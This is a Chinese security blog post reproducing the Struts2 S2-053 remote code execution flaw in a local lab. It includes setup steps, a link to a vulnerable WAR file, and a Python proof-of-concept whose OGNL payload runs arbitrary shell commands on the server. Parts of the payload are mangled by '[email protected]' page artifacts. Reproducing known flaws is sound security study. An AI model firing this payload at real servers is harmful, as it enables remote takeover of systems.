Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现

  • A+
所属分类:安全文章

一.先搭建好测试环境

先下载好XAMPP环境(tomcat8   jdk8 ) 


二.下载有漏洞的war包,下载地址:

http://oe58q5lw3.bkt.clouddn.com/s/struts2/struts2/s2-053.war


三:将war包放到tomcat的webapp目录下,然后重启一下tomcat

Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现


四.搭建好,访问问题页面

Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现

五:poc 用python脚本跑一下

Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现

import urllib2

import sys

from urllib import quote


def exploit(url):

    #res = requests.get(url, timeout=10)

    

    request = urllib2.Request(url)

    

    body=""

    try :

        response = urllib2.urlopen(request)

        body=response.read()

        print body

    except urllib2.HTTPError, e:

        print(str(e))

        

    


if __name__ == "__main__":

    

    url = "http://192.168.3.175:8080/s2-053/"

    param = "name"

    command = "calc"

    

    payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"

    link = "{}/?{}={}".format(url, param, quote(payload))

    print "[*]Generated EXP: {}".format(link)

    print "n[*]Exploiting..."

    exploit(link)


六.最后去服务器看下熟悉的计算器界面弹出了

Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现


本文始发于微信公众号(飓风网络安全):Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: